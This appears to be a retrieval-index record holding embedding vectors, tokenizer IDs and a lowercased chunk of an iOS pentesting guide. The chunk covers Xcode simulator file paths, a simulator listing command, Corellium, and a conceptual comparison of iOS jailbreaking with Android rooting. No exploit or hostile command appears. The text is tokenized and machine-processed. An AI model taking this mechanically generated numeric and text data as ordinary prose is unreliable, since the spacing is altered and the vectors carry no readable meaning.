0.2927868068218231, 0.24503327906131744, 0.5961605310440063, 0.3771857023239136, -0.666311502456665, -0.4277205765247345, 0.320803701877594, -0.43129074573516846, 0.18843784928321838, 0.9487695693969727, -0.6648008823394775, 0.40794700384140015, 0.2023012638092041, 0.3029548227787018, 0.5905073285102844, -0.7453078627586365, -0.08885285258293152, 0.40427008271217346, -0.06806588172912598, 1.3616102933883667, 0.3920213282108307, -0.47827571630477905, -0.30054500699043274, -0.5589432120323181, -0.46176090836524963, -0.47178715467453003, 0.09023447334766388, -0.40497273206710815, 0.6862694025039673, -0.17294198274612427, -0.14305977523326874, 0.2842758893966675, -0.7933281064033508, 0.8263463973999023, 0.09701623022556305, -0.3434905409812927, 0.313729465007782, 0.7581812143325806, 0.04812903329730034, 0.49507826566696167, -0.34415578842163086, -0.05419997125864029, -0.3710077404975891, -0.35403552651405334, -0.08702631294727325, 0.22341415286064148, 0.2698502838611603, -0.30941060185432434, -0.18881434202194214, -0.17943358421325684, 1.152589201927185, 0.5989184379577637, 0.7029979825019836, 0.5474269986152649, 0.2639372646808624, -0.017365844920277596, -0.5359480381011963, 0.5777053833007812, 0.1380561739206314, 1.3663636445999146, 0.35384225845336914, 0.42658355832099915, -0.4324791431427002, -0.5793384909629822, 0.029293745756149292, -0.05593379959464073, -0.5976598262786865, 0.7253684401512146, -0.5067121982574463, 0.2762451469898224, 0.3616161048412323, 0.23445478081703186, -1.1497936248779297, -0.011250745505094528, -0.6026046872138977, -1.7354193925857544, -0.32033655047416687, 0.07538165897130966, -0.05439094826579094, 0.11502564698457718, -0.045114438980817795, -0.12995749711990356, 0.4061511158943176, 0.5411308407783508, 0.08326906710863113, 0.3384595215320587, 1.0639512538909912, -0.3096408545970917, -0.8755654692649841, 0.12182024866342545, 0.04361088573932648, 0.2593405246734619, 0.1631268709897995, 0.3344796299934387, 0.05621480569243431, -0.1490560919046402, 0.06883331388235092, -0.056522153317928314, 0.9405474066734314, -0.18715645372867584, -0.4931602478027344, -0.5200743675231934, -0.15232494473457336, 0.0017070537433028221, -0.10398449748754501, -0.08699756115674973, 0.10468578338623047, 0.7501362562179565, 0.2490570992231369, 1.4348067045211792, 0.12997710704803467, -0.44264891743659973, 0.04791285842657089, 0.1952231228351593, 0.09953349828720093, 0.06962163746356964, 0.2857621908187866, 0.9889612793922424, 0.3584255278110504, 0.7185651659965515, 0.4541148543357849, -0.0315510593354702, -0.26030829548835754, 0.6306139230728149, 0.4329357147216797, 0.2716792821884155, -0.5802603363990784, 0.6075047850608826, 0.8815197348594666, -0.2561708986759186, -1.0003191232681274, -0.32594388723373413, 0.6144627928733826, 1.1766178607940674, -0.6127592921257019, -0.6226397752761841, -0.2631838321685791, -0.1447916030883789, 0.15582898259162903, -0.1588977724313736, 0.22147686779499054, 0.6955055594444275, -0.47132623195648193, 0.4043124318122864, -0.050179652869701385, -0.6024603843688965, -0.4958273768424988, -0.5195191502571106, -1.1325616836547852, -0.364357590675354, -0.8899754881858826, 0.04943317547440529, 0.7743574380874634, -0.2261800467967987, 0.23637716472148895, -0.6238779425621033, -0.07857272773981094, 0.2583819031715393, 0.24277737736701965, 0.7259399890899658, -0.10010337829589844, -0.0319555439054966, -0.714948832988739, 0.06129777058959007, -0.455750972032547, 0.5017567873001099, -0.2758505046367645, -0.005565866827964783, -0.0030807533767074347, -0.44766929745674133, 0.10298816859722137, -1.0289084911346436, 0.4033142030239105, 0.21481357514858246, -0.06394945085048676, 0.33823660016059875, 0.6470625400543213, 0.4455510675907135, 0.22845378518104553, 0.23632486164569855, -0.3631463646888733, 1.0781843662261963, 0.36184170842170715, -0.461977481842041, 0.4014826714992523, 0.09975997358560562, -0.93987637758255, 0.2775304615497589, 0.21576590836048126, 0.4181697964668274, -0.47780299186706543, -0.14256449043750763, 0.9961087703704834, -0.3708769381046295, 0.22341345250606537, -0.25657305121421814, 0.5748921036720276, -0.7681331634521484, -0.1192774698138237, 0.08041979372501373, 0.05402158945798874, 0.5178371071815491, 0.05834970623254776, -1.069716215133667, 0.1482713520526886, -0.12402953207492828, -0.34002208709716797, 0.2584114968776703, 0.19342553615570068, 0.9729596972465515, -0.13631661236286163, 0.033088549971580505, -0.31591030955314636, -0.08163753896951675, 0.26897749304771423, 0.07649507373571396, 0.2372518926858902, -0.7821903228759766, 0.3749469220638275, 0.24940833449363708, -0.23620596528053284, 0.9300918579101562, 0.3940694034099579, -0.9401026964187622, -0.08138030767440796, -0.4816344082355499, -0.7919703125953674, -0.34623947739601135, -0.017396017909049988, 0.029085902497172356, -0.0008227821672335267, 0.20414340496063232, -0.1495542824268341, -0.06379953771829605, 0.10367736220359802, 0.07806829363107681, -0.02780037187039852, 0.08389481902122498, 0.053675614297389984, 0.6308801174163818, -0.5120777487754822, -0.3721797466278076, -0.45398271083831787, 0.8913354873657227, 0.5846288800239563, -0.4849642217159271, 0.7638294100761414, -0.7230529189109802, 0.018339945003390312, 0.35351482033729553, 0.11331555992364883, -0.5370058417320251, 0.7557333111763, 0.2593972682952881, 0.192926824092865, -0.42087864875793457, 0.422772079706192, -0.29637232422828674, -0.23035864531993866, 0.744133472442627, 0.6644098162651062, -0.17230628430843353, -0.6945838928222656, -0.5156917572021484, -0.4722084105014801, -0.612782895565033, -0.08138901740312576, 0.2708941102027893, 0.5045103430747986, -0.6222877502441406, -0.7321850657463074, -0.8439362049102783, 0.4594477415084839, 0.9465532898902893, 1.0493501424789429, 0.8974689841270447, 1.0029442310333252, -0.34032005071640015, -1.0044435262680054, 0.305509090423584, -1.2052174806594849, 0.14497460424900055, -0.14230982959270477, 0.8471433520317078, -0.48543781042099, -0.1456088274717331, -0.4028097093105316, -0.1317986398935318, -1.0112236738204956, -0.24511224031448364, -0.025469278916716576, -0.09502105414867401, -0.9041488170623779, -0.5231934189796448, -0.7546624541282654, -0.030310574918985367, -0.6140904426574707, -0.32641181349754333, -0.3260611593723297, 0.3194902837276459, 1.0680122375488281, -0.7993046641349792, -0.12612652778625488, -0.2980458438396454, -0.015267783775925636, -0.0648401752114296, 0.13524028658866882, -0.30890461802482605, -0.38547447323799133, 0.057491932064294815, -0.37458518147468567, 0.11044197529554367, 0.4843560457229614, 0.4189997911453247, -0.3630768656730652, -0.7084507346153259, -0.36981064081192017, 1.1314852237701416, -0.21206307411193848, -0.10212946683168411, -0.022659674286842346, 0.18114565312862396, 0.2128395140171051, 0.24051210284233093, -0.3545227646827698, -0.20516341924667358, 0.7470710277557373, -0.8190288543701172, 0.7841735482215881, -0.29245030879974365, 0.10919520258903503, -0.37147051095962524, 0.6367120146751404, 0.09895582497119904, 0.311286062002182, -0.3898113965988159, 0.19709883630275726, -0.3084290623664856, 0.3266347348690033, -0.6107085943222046, -0.25339892506599426, 0.8270068764686584, -0.16240109503269196, 0.08746669441461563, -0.14070287346839905, 0.10103554278612137, -0.06877710670232773, 0.2511500418186188, -0.7893193364143372, -0.6485601663589478, 0.8481369018554688, -0.2847593128681183, 0.6151873469352722, -0.3194170296192169, 0.27856314182281494, -0.2736848294734955, -0.6069701910018921, 0.722301721572876, 0.1107809990644455, 0.4556986093521118, -1.047202467918396, -0.46964314579963684, -0.2481638491153717, -0.3810630440711975, -0.08089417219161987, 0.9156374335289001, 0.08407384157180786, -0.3855741620063782, -0.2170076072216034, 0.41196009516716003, -0.4733080565929413, -0.6214860081672668, -0.41038331389427185, -0.3559323251247406, -0.1655019223690033, -0.044161371886730194, 0.6108864545822144, 0.07705406099557877, -0.6030802130699158, 0.7509257793426514, -0.3976351320743561, -0.5365603566169739, -1.2955365180969238, 0.8011504411697388, 0.019174881279468536, 0.23105332255363464, -0.48142626881599426, 0.32829657196998596, -0.5651354789733887, -0.19777220487594604, 0.2856290936470032, 1.111679196357727, 0.15537111461162567, -0.291134238243103, -0.5867917537689209, 0.20507854223251343, 0.42986777424812317, 0.12509627640247345, -0.16725216805934906, 0.10151844471693039, 0.11496886610984802, 0.36334550380706787, -0.884251058101654, -0.25192707777023315, -0.8715284466743469, -0.8467113375663757, 0.15941175818443298, -0.31318360567092896, 0.5655351877212524, -0.6866292357444763, -0.8207419514656067, -0.5436844825744629, 0.33785125613212585, 0.13859052956104279, -0.9345872402191162, 0.391498863697052, -0.48028913140296936, 0.9569252729415894, -0.5442447066307068, 0.3170877695083618, -0.572757363319397, -0.11977576464414597, -0.31675443053245544, 0.7819156646728516, 0.044634636491537094, 0.025947513058781624, 0.4754449725151062, -0.027090949937701225, 0.12962079048156738, 0.7153330445289612, -1.1560919284820557, -0.30030903220176697, -0.1090000569820404, -0.15363912284374237, -0.35587209463119507, 0.8374534249305725, -0.4878753423690796, 0.54681396484375, -0.19319403171539307, -0.038786329329013824, 0.7540010213851929, -0.06544271111488342, -0.50223708152771, 0.14240005612373352, 0.9418264031410217, -0.875364363193512, 0.38226035237312317, 0.15976360440254211, 0.8764027953147888, 0.3940576910972595, -0.11765957623720169, -1.0518999099731445, 0.7735922932624817, -0.35316091775894165, -1.3894754648208618, 0.5724760890007019, -0.1439017951488495, -0.23053808510303497, -0.10926339775323868, -0.19185233116149902, 0.03613181412220001, -0.4052826762199402, 0.11369162797927856, 1.2323905229568481, 0.10259421914815903, 0.6678283214569092, -1.1740338802337646, 0.8608028888702393, 0.7687638401985168, -0.20241905748844147, 0.15479308366775513, -0.3809925317764282, 0.8679819107055664, 0.06902389228343964, -0.35439983010292053, -0.5393938422203064, -0.7351592183113098, -0.32880496978759766, 0.24513953924179077, 0.33445432782173157, 0.4749353229999542, 0.07243470847606659, -0.5174448490142822, 0.5011646151542664, 0.2608037292957306, -0.39443227648735046, -0.14046131074428558, 0.9155576825141907, 0.5818876028060913, 0.12049570679664612, -0.11961404234170914, 0.28103604912757874, 0.10801882296800613, -0.08601591736078262, 0.4985755681991577, -0.0726538673043251, -0.36123597621917725, 0.8990515470504761, 0.4646996855735779, -1.2391915321350098, -0.6992785930633545, -0.15802748501300812, 0.17526143789291382, 0.19017724692821503, -0.40393728017807007, -0.21249181032180786, -0.25398528575897217, -0.2836625277996063, 0.15220031142234802, 0.04485492408275604, -0.09758363664150238, 0.006672336254268885, -0.7863687872886658, -0.011639701202511787, -0.5620899796485901, -0.33572807908058167, 0.4321190118789673, -1.0280414819717407, -0.9905121922492981, -0.674930214881897, 0.3165961802005768, 0.058496180921792984, -0.2889660596847534, 1.2268614768981934, -0.7420545220375061, 0.03294634819030762, 0.313778281211853, -0.2992681562900543, 0.43011975288391113, 0.36645036935806274, 0.6225951313972473, 0.4215812385082245, 0.09633449465036392, -0.5223439335823059, -0.4060748815536499, 0.688340961933136, 0.20160560309886932, 0.465168833732605, -0.5286445021629333, -0.18010953068733215, -0.5174444317817688, 0.09581758826971054, 0.09321670234203339, -0.4188486337661743, -0.6207979917526245, -0.5996842384338379, 0.00455867825075984, 0.5379512310028076, -0.4732755422592163, -0.6710447072982788, 0.17314285039901733, 0.12438825517892838, -0.0031436483841389418, -0.2964176535606384, 0.5012352466583252, -0.4157088100910187, 0.4866196811199188, -1.0146536827087402, 0.8049629926681519, -0.6647552251815796, -0.5486817359924316, -0.6320586204528809, -0.5515204071998596, -0.7377046346664429, -0.7492935061454773, -0.5467069149017334, 0.031461089849472046, -0.5380489826202393, 0.378225713968277, -0.8730884790420532, 0.10610073804855347, 0.023142730817198753, -0.15931667387485504, -0.043556757271289825, 0.5525045990943909, -0.24734671413898468, 0.2915843427181244, 0.31089329719543457, 0.3204309642314911, 0.32485049962997437, -0.35290464758872986, 0.8716260194778442, -0.10811818391084671, 0.18427962064743042, 0.14394907653331757, -0.27818918228149414, -0.13331545889377594, 0.3095819056034088, 0.4165199100971222, -0.566577136516571, 0.2240283042192459, -0.7357436418533325, -0.02722313068807125, 0.0349748395383358, -0.010473538190126419, 0.04788324609398842, 0.833511233329773, 0.5584930777549744, 0.22860360145568848, -0.17202630639076233, 0.43813416361808777, 0.10910044610500336, -0.3784794211387634, -0.16173706948757172, 0.09075505286455154, 0.25833776593208313, -0.5544924736022949, -0.09774686396121979, -0.19667565822601318, -0.9162878394126892, 0.4920094311237335, -0.40103140473365784, 0.5031774640083313, -0.420980840921402, -0.8855891823768616, 0.6429620981216431, 0.21852001547813416, 0.527466893196106, 0.4231124222278595, 0.22751547396183014, 0.48974108695983887, -1.3391761779785156, 0.023554019629955292, -0.6761633157730103, -0.4073462188243866, -0.0795106366276741, -0.3652805685997009, -0.2345915138721466, -0.2081242799758911, 0.1384231448173523, 0.8736154437065125, 0.03795253857970238, -0.7164958119392395, 0.1667761206626892, 0.13373184204101562, 0.03542555868625641, 0.40430474281311035, -0.533491313457489, -0.4250360429286957, -0.028232773765921593, 0.5047056078910828, -0.41532060503959656, -0.6692165732383728, 0.2063143104314804, 0.6203448176383972, 0.13922765851020813, 0.16416499018669128, -0.08635619282722473, -0.1892608404159546, 0.15838168561458588, 0.24753402173519135, 0.7961704134941101, 0.5901594758033752, -0.9275858998298645, 0.548969566822052, -0.23563086986541748, 0.663953959941864, -0.4031303822994232, -0.21062228083610535, 0.1551896333694458, -0.16740423440933228, -0.5392137765884399, 0.25551849603652954, 0.21620871126651764, -0.21526999771595, 0.5114356875419617, -0.4471326470375061, 0.796906590461731, -0.2445136457681656, -0.02885797619819641, -0.7450363636016846, 0.3938046395778656, 0.14374548196792603, 0.6349620819091797, 0.020570261403918266, 0.3808738589286804, 0.7154996395111084, -0.5638097524642944, 0.04915127530694008, 0.567965030670166, -0.0018128964584320784, -0.5709540247917175, 0.2675212621688843, -0.48168501257896423, 0.09828295558691025, -0.27484598755836487, -0.5311647057533264, 0.3462848365306854, -0.04052872583270073, 0.5237602591514587, -0.4256838858127594, 0.35156694054603577, 1.1981925964355469, -0.5254210233688354, 0.9818095564842224, 0.5097758769989014, -0.140913724899292, 0.5273202061653137, -0.3042983412742615, -0.6746020913124084, 0.5198301672935486, 0.6005624532699585, -0.027690768241882324, 0.2195669561624527, 0.491355836391449, 0.43936216831207275, -0.47857269644737244, 0.6704020500183105, 0.2943378984928131, -1.0975689888000488, -0.1778617948293686, 0.7779538631439209, -0.6222635507583618, -0.9267364144325256, -0.10795459896326065, 0.21357430517673492, -0.6697944402694702, 0.15751810371875763, -0.6373721361160278, 0.21652324497699738, -0.8456734418869019, 0.425256609916687, -0.3427880108356476, -0.006464500445872545, 0.4759278893470764, -0.337992787361145, -0.8503302335739136, 1.103180170059204, 0.04528268799185753, 0.4870896637439728, -0.1986827403306961, 0.1783473789691925, 0.0704105943441391, 0.1544816941022873, 0.3478294610977173, -0.24572379887104034, 0.735664427280426, -0.17264853417873383, 0.08039356768131256, -0.5465845465660095, 0.42593321204185486, -0.23989631235599518, 0.8478371500968933, -0.5007765293121338, -0.8658693432807922, -0.6901301145553589, 0.45705047249794006, -0.3762637972831726, -1.1574186086654663, 0.02343684993684292, -0.2272094339132309, -0.31536728143692017, 0.49459967017173767, -0.06756415218114853, 0.6921205520629883, 1.0212377309799194, -0.4057076573371887, -0.4377400279045105, 0.06550580263137817, -0.4064520001411438, 0.014497312717139721, 1.2165210247039795, 0.14186175167560577, -0.02445295639336109, 0.13967126607894897, -0.4473368525505066, 0.08539561927318573, 0.36617597937583923, -0.42831113934516907, -0.5257084369659424, 0.7507553696632385, -0.23390613496303558, 1.0775415897369385, 1.0808933973312378, 0.32530948519706726, -0.4637002944946289, 0.22961042821407318, 0.6632272601127625, -0.49384742975234985, 0.5230405926704407, 0.1663009077310562, -0.05339023843407631, 0.20369236171245575, -0.2555341422557831, 0.8068658113479614, -0.21783167123794556, -0.21970055997371674, -0.08845444768667221, -0.5991172194480896, -0.6760015487670898, -0.4199158847332001, -0.3384019136428833, -0.2824804186820984, -0.41133907437324524, 1.002512812614441, -0.89627605676651, -0.07475453615188599, -0.691917896270752, 0.4564133584499359, -0.16415490210056305, 0.2037385106086731, 0.4926185607910156, -0.10775754600763321, 0.7245392203330994, -1.1419633626937866, 4.20783805847168, 0.23345322906970978, 0.15967102348804474, 0.11382840573787689, 0.321866512298584, 0.7578892111778259, 1.0256321430206299, -1.027860164642334, 0.5190753936767578, -0.3027942478656769, -0.4547586143016815, -0.10324124246835709, 0.6130366325378418, -0.135354682803154, -0.05787147954106331, 0.2230120599269867, -0.16481952369213104, 0.1655503362417221, 0.49096208810806274, -1.0054603815078735, -0.48818275332450867, 0.3517594337463379, -0.08206545561552048, 0.9021837115287781, 0.603990375995636, 0.09695570915937424, 0.5159897804260254, -0.9946324229240417, -0.24090301990509033, 0.3823476731777191, 0.2717683017253876, -0.3581901490688324, 0.5412886738777161, -0.42701008915901184, -0.5224658250808716, 0.6495039463043213, 0.8658846616744995, -0.4596290588378906, -0.40867912769317627, 0.387477308511734, 0.11300089210271835, -0.09176164120435715, 0.5664960741996765, -0.2973269820213318, -0.34688565135002136, 0.49406659603118896, -0.09558943659067154, 0.6087735891342163, 0.5748924016952515, -0.8730592131614685, 0.2760765850543976, -0.07462877035140991, 0.44691479206085205, 0.0795944482088089, -0.8413187265396118, 0.21673715114593506, -0.19431008398532867, -0.6887413859367371, -0.2937200963497162, -0.23878933489322662, 0.6593878865242004, -1.072422742843628, 0.47244441509246826, -0.12502425909042358, -0.6540778875350952, 0.977401614189148, -0.17771391570568085, 0.7108269333839417, 0.526950478553772, -0.4748965799808502, -0.3344685435295105, -0.05964607745409012, -0.4703676700592041, -0.5001978278160095, 0.9766884446144104, -0.4506770372390747, -0.049733009189367294, 0.37743982672691345, 0.3352390229701996, -0.7894971370697021, 0.08688779175281525, -0.3748951852321625, -0.5957286357879639, 0.2724771797657013, 0.8749057054519653, 0.08495048433542252, 0.2656884491443634, -0.9351946115493774, 0.19800087809562683, -0.14012564718723297, 0.4276066720485687, 0.8208142518997192, -0.4236297905445099, 0.12341924756765366, 0.17741720378398895 ]
[ 101, 16380, 5604, 4044, 23804, 9722, 2565, 2050, 9347, 2075, 4767, 2003, 1037, 3074, 1997, 2270, 1998, 2797, 6309, 2008, 2024, 3378, 2019, 6207, 9722, 4070, 1012, 1999, 2344, 2000, 3696, 18726, 2017, 2342, 2000, 3477, 5585, 1002, 1013, 2095, 2000, 4236, 1999, 1996, 6207, 9722, 2565, 2000, 2131, 2115, 9347, 2075, 4767, 1012, 2302, 2023, 2017, 2180, 1005, 1056, 2022, 2583, 2000, 2448, 5097, 2013, 1996, 3120, 3642, 1999, 1037, 3558, 5080, 1012, 2178, 5724, 2000, 2079, 2023, 2003, 2000, 2224, 1037, 7173, 29162, 5080, 1012, 3225, 1999, 1060, 16044, 1021, 1012, 1016, 6207, 2038, 3024, 2019, 5724, 2000, 3443, 1037, 2489, 16380, 2458, 9347, 2075, 6337, 2008, 4473, 2000, 4339, 1998, 3231, 2115, 4646, 2006, 1037, 2613, 18059, 1012, 2175, 2000, 1060, 16044, 1011, 1011, 1028, 18394, 1011, 1011, 1028, 6115, 1011, 1011, 1028, 1009, 1006, 5587, 2047, 10439, 3669, 8909, 2017, 2115, 22496, 1007, 1011, 1011, 1028, 11562, 2006, 1996, 6207, 8909, 2580, 1011, 1011, 1028, 6133, 17987, 1011, 1011, 1028, 1009, 1006, 6207, 2458, 1007, 1011, 1011, 1028, 2589, 1035, 1035, 2059, 1010, 1999, 2344, 2000, 2448, 2115, 4646, 1999, 2115, 18059, 2017, 2342, 2034, 2000, 5769, 1996, 18059, 2000, 3404, 1996, 3274, 1012, 2059, 1010, 2017, 2064, 3046, 2000, 2448, 1996, 4646, 1999, 1996, 4684, 2013, 1060, 16044, 1010, 2021, 1998, 7561, 2097, 3711, 1012, 2061, 2175, 2000, 10906, 1011, 1011, 1028, 2236, 1011, 1011, 1028, 17879, 1998, 5080, 2968, 1011, 1011, 1028, 7276, 1996, 4895, 24669, 2098, 6337, 1998, 11562, 1000, 3404, 1000, 1012, 3602, 2008, 5097, 2772, 2011, 1996, 2168, 6608, 8196, 2064, 3745, 4219, 2006, 1037, 5851, 5450, 1010, 2066, 3145, 24925, 2078, 5167, 1012, 1996, 9347, 2075, 17879, 2024, 8250, 2503, 1996, 3042, 1999, 1013, 3075, 1013, 4684, 24844, 6610, 1013, 9347, 2075, 21572, 8873, 3238, 5714, 20350, 22074, 2008, 1037, 25837, 3475, 1005, 1056, 1996, 2168, 2004, 4372, 7861, 20350, 1012, 1996, 25837, 2074, 26633, 2015, 1996, 9164, 1997, 1996, 5080, 1998, 4972, 2021, 2123, 1005, 1056, 2941, 2224, 2068, 1012, 1996, 16380, 17371, 2243, 25837, 4107, 1037, 3020, 1011, 2504, 12504, 1997, 2019, 16380, 5080, 1012, 2087, 14780, 1010, 7861, 20350, 8026, 12086, 2024, 9227, 2000, 1060, 20842, 3642, 2612, 1997, 2849, 3642, 1012, 18726, 9227, 2005, 1037, 2613, 5080, 2123, 1005, 1056, 2448, 1010, 2437, 1996, 25837, 11809, 2005, 2304, 3482, 4106, 1998, 7901, 3330, 1012, 25837, 10760, 2034, 2518, 2017, 2342, 2000, 2113, 2003, 2008, 4488, 1037, 7279, 22199, 2503, 1037, 25837, 2097, 2172, 2062, 3132, 2084, 2725, 2009, 1999, 1037, 7173, 29162, 5080, 1012, 2035, 1996, 5906, 3223, 2000, 3857, 1998, 2490, 2019, 16380, 10439, 2024, 2069, 3985, 3569, 2006, 6097, 9808, 1012, 6207, 1005, 1055, 2139, 13743, 6994, 2005, 4526, 1013, 2139, 8569, 12588, 1013, 6602, 2075, 16380, 5097, 2003, 1060, 16044, 1012, 2009, 2064, 2022, 2109, 2000, 8816, 2060, 6177, 2107, 2004, 25837, 2015, 1998, 2367, 17371, 2243, 4617, 3223, 2000, 3857, 1998, 3231, 2115, 10439, 1012, 2009, 1005, 1055, 3811, 6749, 2000, 8816, 1060, 16044, 2013, 1996, 2880, 10439, 3573, 1012, 2060, 4617, 2089, 2022, 4755, 15451, 8059, 1012, 1996, 25837, 6764, 2064, 2022, 2179 ]
hack_tricks
431.txt
0
in / users / < username > / library / developer / coresimulator / devicesto open the simulator, run xcode, then press in the xcode tab - - > open developer tools - - > simulator _ _ in the following image clicking in " ipod touch [... ] " you can select other device to test in : applications in the simulatorinside / users / < username > / library / developer / coresimulator / devices you may find all the installed simulators. if you want to access the files of an application created inside one of the emulators it might be difficult to know in which one the app is installed. a quick way to find the correct uid is to execute the app in the simulator and execute : xcrun simctl list | grep booted iphone 8 ( bf5da4f8 - 6bbe - 4ea0 - ba16 - 7e3afd16c06c ) ( booted ) once you know the uid the apps installed within it can be found in / users / < username > / library / developer / coresimulator / devices / { uid } / data / containers / data / applicationhowever, surprisingly you won't find the application here. you need to access / users / < username > / library / developer / xcode / deriveddata / { application } / build / products / debug - iphonesimulator / and in this folder you can find the package of the application. emulatorcorellium is the only publicly available ios emulator. it is an enterprise saas solution with a per user license model and does not offer any trial license. jailbeakingapple strictly requires that the code running on the iphone must be signed by a certificate issued by apple. jailbreaking is the process of actively circumventing such restrictions and other security controls put in places by the os. therefore, once the device is jailbroken, the integrity check which is responsible for checking apps being installed is patched so it is bypassed. unlike android, you cannot switch to " developer mode " in ios to run unsigned / untrusted code on the device. root in android comparisonios jailbreaking is often compared to android rooting, but the process is actually quite different. to explain the difference, we'll first review the concepts of " rooting " and " flashing " on android. rooting : this typically involves installing the su binary on the system or replacing
[ 0.1468828171491623, -0.4244101643562317, -0.13495966792106628, 0.028187988325953484, 0.34220778942108154, 0.10740968585014343, 0.41068026423454285, -0.29720622301101685, -0.02392495982348919, 0.248261496424675, -0.07018928229808807, -0.3720465898513794, 0.22541865706443787, -0.23649193346500397, -0.06786195188760757, -0.43294665217399597, -0.4527800679206848, 0.2559047043323517, -0.5771497488021851, -0.2072877585887909, 0.3357798755168915, 0.3878411054611206, -0.38139963150024414, -0.7892805933952332, 0.44031763076782227, 0.04231598228216171, 0.6488361954689026, 0.09275268763303757, 0.34489357471466064, 0.666580855846405, 0.16998934745788574, -0.26708629727363586, -0.1873481422662735, -0.3970557749271393, 0.548377275466919, -0.2679700553417206, 0.6857105493545532, -0.3170841932296753, 0.2005126029253006, -0.6638328433036804, 0.2355087399482727, -0.6949977874755859, -0.6055651903152466, -0.26109778881073, -0.7243072986602783, -0.6486154198646545, -0.45955756306648254, -0.5590282082557678, 0.7805624604225159, -0.21395443379878998, 0.20973347127437592, -0.2875962555408478, -0.028085239231586456, 0.3855378031730652, 0.5768128037452698, -0.2574223577976227, 0.368527352809906, -0.3130642771720886, -0.32301267981529236, 0.6922076344490051, -0.12501011788845062, 0.37905043363571167, 0.3785264492034912, -0.6069800853729248, 0.23650382459163666, -0.020579278469085693, -0.5345467329025269, -0.6581065654754639, -0.2502014636993408, -0.28897324204444885, 0.12910538911819458, 0.7594403028488159, 0.23867982625961304, -0.7925328016281128, -0.4782510995864868, -0.41590195894241333, 0.07266248762607574, -0.6190875768661499, 0.2571847140789032, 1.098134994506836, -0.1799371987581253, 1.044817566871643, 0.05200467258691788, -0.0704008936882019, -0.27587246894836426, -0.17405185103416443, 0.6678279042243958, 0.10959045588970184, -0.30528825521469116, -0.4290253520011902, 0.7379723191261292, 0.6311312913894653, -0.7561052441596985, -0.09398137778043747, 0.4880193769931793, 0.8467479944229126, 0.010451637208461761, 0.12981244921684265, 0.41710686683654785, -0.19411338865756989, 1.0652971267700195, 0.6512930989265442, -0.4828498363494873, 0.7164984345436096, 0.055146683007478714, 0.7093744874000549, -0.10410701483488083, -0.5202332139015198, -0.36833205819129944, -0.4243735074996948, 0.4575493633747101, -0.13495823740959167, 0.7528891563415527, -0.0885998010635376, -0.019065918400883675, 0.226420059800148, 0.3175083100795746, 0.2727185785770416, -0.5525964498519897, 0.4090580642223358, -0.04323011636734009, 0.09905240684747696, 0.1971459984779358, -0.48497721552848816, 0.05025780573487282, 0.43552014231681824, 0.06794604659080505, 0.48383456468582153, -0.10033878684043884, 0.09514724463224411, -0.09565892070531845, -0.35480359196662903, -0.21286888420581818, 0.6426492929458618, -0.8984968066215515, 0.5104284882545471, 0.15978515148162842, 0.23619918525218964, 0.3433941602706909, -1.0670530796051025, 0.1686149388551712, 0.3240523636341095, -0.3936515152454376, 1.01350998878479, 0.2526921331882477, -0.5238105058670044, -0.5641281604766846, 0.042840272188186646, -0.3697139024734497, -0.3475760519504547, -0.24787135422229767, 0.08639973402023315, 1.0905026197433472, -0.11595561355352402, -0.11765509098768234, 0.6622585654258728, -0.41554659605026245, 1.046161413192749, 0.16516847908496857, 0.1086018905043602, 0.09781394153833389, 0.7459158897399902, 0.35164874792099, 0.2943103313446045, 0.18740710616111755, -0.06423883140087128, -0.5495266914367676, -0.23678772151470184, 0.11280379444360733, -0.0662357434630394, 0.2330651730298996, -0.01511004101485014, -0.2467377483844757, 0.6379796266555786, 1.0508681535720825, 1.0521093606948853, -0.16146348416805267, -0.1610599011182785, 0.15812204778194427, 0.07459542155265808, -0.7290218472480774, -0.01722622662782669, -0.2781681418418884, 0.7680801749229431, -0.4314563274383545, 0.6508972644805908, -0.32493939995765686, -0.6192802786827087, -0.3002750277519226, 0.34132176637649536, -0.4279545247554779, 0.5127442479133606, -0.7704665660858154, 0.5111185908317566, 0.291508287191391, -0.48453763127326965, -0.7894359827041626, -0.2882930040359497, -0.3524613678455353, -1.9520087242126465, -0.6825734972953796, -0.0757894292473793, 0.2585960924625397, -0.16566993296146393, -0.026045143604278564, -0.05481773987412453, 0.6564770936965942, 0.3994992673397064, -0.13299119472503662, 0.21465636789798737, 0.6161534786224365, -0.4856503903865814, -0.6859045028686523, 0.43848344683647156, -0.2510335445404053, 0.26280590891838074, 0.34800225496292114, 0.3256390392780304, -0.11359065026044846, 0.22612451016902924, 0.003921979106962681, 0.9406120777130127, 1.1556296348571777, 0.21779829263687134, -0.6003215312957764, -0.42906472086906433, -0.09726883471012115, 0.11624342203140259, -0.005606506951153278, -0.15217846632003784, 0.22553107142448425, 0.8154656887054443, 0.5517961382865906, 0.8625209927558899, 0.3748384416103363, 0.07923655956983566, -0.21926772594451904, 0.04517221823334694, 0.2884770333766937, -0.026183299720287323, -0.00844566896557808, 0.6368242502212524, -0.3803821802139282, 0.4310843050479889, 0.37920254468917847, -0.1203823909163475, 0.042229849845170975, 0.04813568294048309, 0.38936638832092285, 0.5091037750244141, -0.526322603225708, 0.6232476234436035, 0.6167300343513489, -0.6340270042419434, -1.2646408081054688, -0.557087779045105, 0.928128182888031, 0.5353995561599731, -0.688052237033844, -0.617022693157196, 0.21698151528835297, -0.3368759751319885, 0.12994924187660217, -0.539247453212738, -0.09271550923585892, 0.8519145250320435, -0.1181236132979393, 1.0038557052612305, -0.18813548982143402, -0.20850598812103271, -0.562113344669342, -0.26700106263160706, -1.2734581232070923, -0.1417393684387207, -0.5674241185188293, -0.31528741121292114, 0.13609875738620758, -0.13139334321022034, 0.15704220533370972, -0.8767160177230835, -0.3890154957771301, 0.4626797139644623, 0.22243037819862366, 0.1090599000453949, 0.04571165144443512, 0.28498348593711853, -0.7903411388397217, 0.3522450923919678, -0.45299601554870605, 0.32561376690864563, 0.1503506451845169, 0.17606738209724426, -0.6448432803153992, -0.9400761723518372, 0.03365543112158775, -0.7813770174980164, 0.5810615420341492, 0.1651889532804489, 0.12476685643196106, 0.3874535858631134, 0.047619692981243134, 0.24069254100322723, 0.5122758746147156, 0.17860054969787598, -0.39067602157592773, 0.7036808133125305, 0.0669524297118187, -0.13114768266677856, 0.26142585277557373, -0.2775392532348633, -0.7965704202651978, 0.09694182127714157, 0.4430152475833893, 0.32952627539634705, -0.00004176384027232416, -0.010643093846738338, 0.37984195351600647, 0.06785611063241959, 0.11057152599096298, 0.22534334659576416, -0.0783541351556778, -0.48971399664878845, -0.19097241759300232, 0.12385883182287216, 0.030998779460787773, 0.44889867305755615, -0.1565588116645813, -1.139051914215088, -0.3691294193267822, -0.12323468923568726, -0.7126741409301758, -0.10232169181108475, 0.31792151927948, 